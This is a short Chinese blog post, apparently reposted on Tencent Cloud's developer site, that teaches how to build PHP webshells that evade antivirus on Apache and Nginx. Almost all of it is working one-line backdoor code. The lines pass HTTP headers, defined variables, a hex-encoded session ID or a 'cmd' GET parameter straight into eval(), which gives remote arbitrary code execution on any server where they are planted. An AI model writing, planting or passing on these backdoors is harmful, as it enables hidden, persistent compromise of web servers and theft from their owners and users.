PHP利用Apache、Nginx的特性实现免杀Webshell
PHP利用Apache、Nginx的特性实现免杀Webshell
Xcnte
发布于 2021-12-14 10:33:17
发布于 2021-12-14 10:33:17
get_defined_vars()、getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell
环境 | 函数 | 用法 |
|---|---|---|
nginx | get_defined_vars() | 返回由所有已定义变量所组成的数组 |
apache | getallheaders() | 获取全部 HTTP 请求头信息 |
apache环境
<?php
eval(next(getallheaders()));
?>
apache和nginx环境通用
<?php
eval(implode(reset(get_defined_vars())));
?>
另外一种通过执行伪造的sessionid值,进行任意代码执行。
<?php
eval(hex2bin(session_id(session_start())));
?>
706870696e666f28293b这个是phpinfo();的hex编码。
给webshell加密码
<?php eval(get_defined_vars()['_GET']['cmd']);?>版权属于:Xcnte' s Blog(除特别注明外)
本文链接:https://cloud.tencent.com/developer/article/1918353
本站文章采用 知识共享署名4.0 国际许可协议 进行许可,请在转载时注明出处及本声明!
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录